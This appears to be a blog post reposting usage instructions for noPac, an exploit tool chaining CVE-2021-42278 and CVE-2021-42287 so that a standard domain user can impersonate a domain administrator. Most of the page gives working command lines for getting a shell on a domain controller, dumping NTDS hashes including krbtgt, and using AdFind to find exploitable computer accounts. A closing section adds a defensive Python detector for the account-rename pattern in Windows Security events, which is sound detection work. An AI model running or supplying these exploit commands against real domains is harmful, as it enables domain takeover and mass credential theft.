Tuesday, September 6, 2022

Exploiting CVE-2021-42278 And CVE-2021-42287 To Impersonate DA From Standard Domain User

Modified from sam-the-admin.

Usage

SAM THE ADMIN CVE-2021-42278 + CVE-2021-42287 chain

positional arguments:
  [domain/]username[:password]
                        Account used to authenticate to DC.

optional arguments:
  -h, --help            show this help message and exit
  --impersonate IMPERSONATE
                        target username that will be impersonated (through S4U2Self) for querying the ST. Keep in mind this will only work if the identity provided in this script is allowed for delegation to the SPN specified
  -domain-netbios NETBIOSNAME
                        Domain NetBIOS name. Required if the DC has multiple domains.
  -target-name NEWNAME  Target computer name; if not specified, it will be randomly generated.
  -new-pass PASSWORD    New computer password; if not specified, it will be randomly generated.
  -old-pass PASSWORD    Target computer password; use if you know the password of the target you enter with -target-name.
  -old-hash LMHASH:NTHASH
                        Target computer hashes; use if you know the hash of the target you enter with -target-name.
  -debug                Turn DEBUG output ON
  -ts                   Adds timestamp to every logging output
  -shell                Drop a shell via smbexec
  -no-add               Forcibly change the password of the target computer.
  -create-child         Current account has permission to CreateChild.
  -dump                 Dump hashes via secretsdump
  -use-ldap             Use LDAP instead of LDAPS

authentication:
  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH
  -no-pass              don't ask for password (useful for -k)
  -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on account parameters. If valid credentials cannot be found, it will use the ones specified in the command line
  -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256 bits)
  -dc-host hostname     Hostname of the domain controller to use. If omitted, the domain part (FQDN) specified in the account parameter will be used
  -dc-ip ip             IP of the domain controller to use. Useful if you can't resolve the FQDN specified in the account parameter

execute options:
  -port [destination port]
                        Destination port to connect to SMB Server
  -mode {SERVER,SHARE}  mode to use (default SHARE, SERVER needs root!)
  -share SHARE          share where the output will be grabbed from (default ADMIN$)
  -shell-type {cmd,powershell}
                        choose a command processor for the semi-interactive shell
  -codec CODEC          Sets encoding used (codec) for the target's output (default "GBK").
  -service-name service_name
                        The name of the service used to trigger the payload

dump options:
  -just-dc-user USERNAME
                        Extract only NTDS.DIT data for the user specified. Only available for DRSUAPI approach. Implies also -just-dc switch
  -just-dc              Extract only NTDS.DIT data (NTLM hashes and Kerberos keys)
  -just-dc-ntlm         Extract only NTDS.DIT data (NTLM hashes only)
  -pwd-last-set         Shows pwdLastSet attribute for each NTDS.DIT account. Doesn't apply to -outputfile data
  -user-status          Display whether or not the user is disabled
  -history              Dump password history, and LSA secrets OldVal
  -resumefile RESUMEFILE
                        resume file name to resume NTDS.DIT session dump (only available to DRSUAPI approach). This file will also be used to keep updating the session's state
  -use-vss              Use the VSS method instead of default DRSUAPI
  -exec-method [{smbexec,wmiexec,mmcexec}]
                        Remote exec method to use at target (only when using -use-vss). Default: smbexec

Note: If -host-name is not specified, the tool will automatically get the domain controller hostname; please select the hostname of the host specified by -dc-ip. If --impersonate is not specified, the tool will randomly choose a domain admin to use. LDAPS is used by default; if you get an SSL error, try adding -use-ldap.

GetST

Auto get shell

python noPac.py cgdomain.com/sanfeng:'[email protected]' -dc-ip 10.211.55.203 -dc-host lab2012 -shell --impersonate administrator

Dump hash

python noPac.py cgdomain.com/sanfeng:'[email protected]' -dc-ip 10.211.55.203 -dc-host lab2012 --impersonate administrator -dump
python noPac.py cgdomain.com/sanfeng:'[email protected]' -dc-ip 10.211.55.203 -dc-host lab2012 --impersonate administrator -dump -just-dc-user cgdomain/krbtgt

Scanner

MAQ = 0

Method 1

Find the computer accounts that can be modified by the current user.

AdFind.exe -sc getacls -sddlfilter ;;"[WRT PROP]";;computer;domainuser -recmute

Example: add -no-add and select the target with -target-name.

python noPac.py cgdomain.com/sanfeng:'[email protected]' -dc-ip 10.211.55.200 -dc-host dc2008 --impersonate administrator -no-add -target-name DomainWin7$ -old-hash :2a99c4a3bd5d30fc94f22bf7403ceb1a -shell

Warning!! Do not modify the password of a computer in the domain through LDAPS or SAMR, it may break the trust relationship between the computer and the primary domain !!

Method 2

Find an account with CreateChild permission, and use that account to exploit.

AdFind.exe -sc getacls -sddlfilter ;;"[CR CHILD]";;computer; -recmute

Example: add -create-child

python noPac.py cgdomain.com/venus:'[email protected]' -dc-ip 10.211.55.200 -dc-host dc2008 --impersonate administrator -create-child
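From the defender's side, the sequence the tool performs in both the default flow (a new machine account is created, renamed to the DC's name without the trailing "$", then renamed back) and the -no-add variant of Method 1 (an existing computer account is renamed) leaves a recognisable trail in the Security log. The following is an added detection example written for this page, not code from noPac or sam-the-admin; the event field names, the DC hostname list and all sample events are constructed assumptions.

```python
# Added example: flags the sAMAccountName spoofing rename pattern over a few
# modelled fields of Windows Security events 4741 (computer account created),
# 4781 (account name changed) and 4742 (computer account changed).

# Constructed sample events (not captured from a real domain controller).
SAMPLE_EVENTS = [
    {"id": 4741, "subject": "CGDOMAIN\\sanfeng", "target": "WIN-RANDOM$"},
    {"id": 4781, "subject": "CGDOMAIN\\sanfeng", "old": "WIN-RANDOM$", "new": "lab2012"},
    {"id": 4781, "subject": "CGDOMAIN\\sanfeng", "old": "lab2012", "new": "WIN-RANDOM$"},
    {"id": 4781, "subject": "CGDOMAIN\\helpdesk", "old": "OLDPC$", "new": "NEWPC$"},
    {"id": 4742, "subject": "CGDOMAIN\\helpdesk", "target": "FILESRV01$"},
]

# Hypothetical DC hostname list, taken from the page's command examples;
# in practice enumerate it from the domain rather than hard-coding it.
DC_HOSTNAMES = {"lab2012", "dc2008"}


def find_nopac_indicators(events, dc_hostnames):
    """Return (rule, subject, detail) tuples for suspicious account renames.

    Rules:
      machine_account_lost_dollar  a computer account's name lost its '$'
      renamed_to_dc_name           the new name equals a DC hostname
      create_rename_revert         the same subject created the account
                                   (4741) and later renamed it back to that name
    """
    dcs = {h.lower() for h in dc_hostnames}
    created_by = {}  # computer account name (lower) -> creating subject
    findings = []
    for ev in events:
        if ev["id"] == 4741:
            created_by[ev["target"].lower()] = ev["subject"]
            continue
        if ev["id"] != 4781:
            continue  # 4742 and other ids are not used by these rules
        old, new = ev["old"], ev["new"]
        detail = f"{old} -> {new}"
        if old.endswith("$") and not new.endswith("$"):
            findings.append(("machine_account_lost_dollar", ev["subject"], detail))
        if new.lower().rstrip("$") in dcs:
            findings.append(("renamed_to_dc_name", ev["subject"], detail))
        if created_by.get(new.lower()) == ev["subject"]:
            findings.append(("create_rename_revert", ev["subject"], detail))
    return findings


if __name__ == "__main__":
    for rule, subject, detail in find_nopac_indicators(SAMPLE_EVENTS, DC_HOSTNAMES):
        print(f"{rule:30} {subject:20} {detail}")
```

On the sample above only the sanfeng activity is reported; the helpdesk rename keeps its "$" and matches no DC name, so it passes. Setting ms-DS-MachineAccountQuota to 0, as the Scanner section assumes, removes the 4741 step but not the rename of an existing account, so the 4781 rules still matter.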


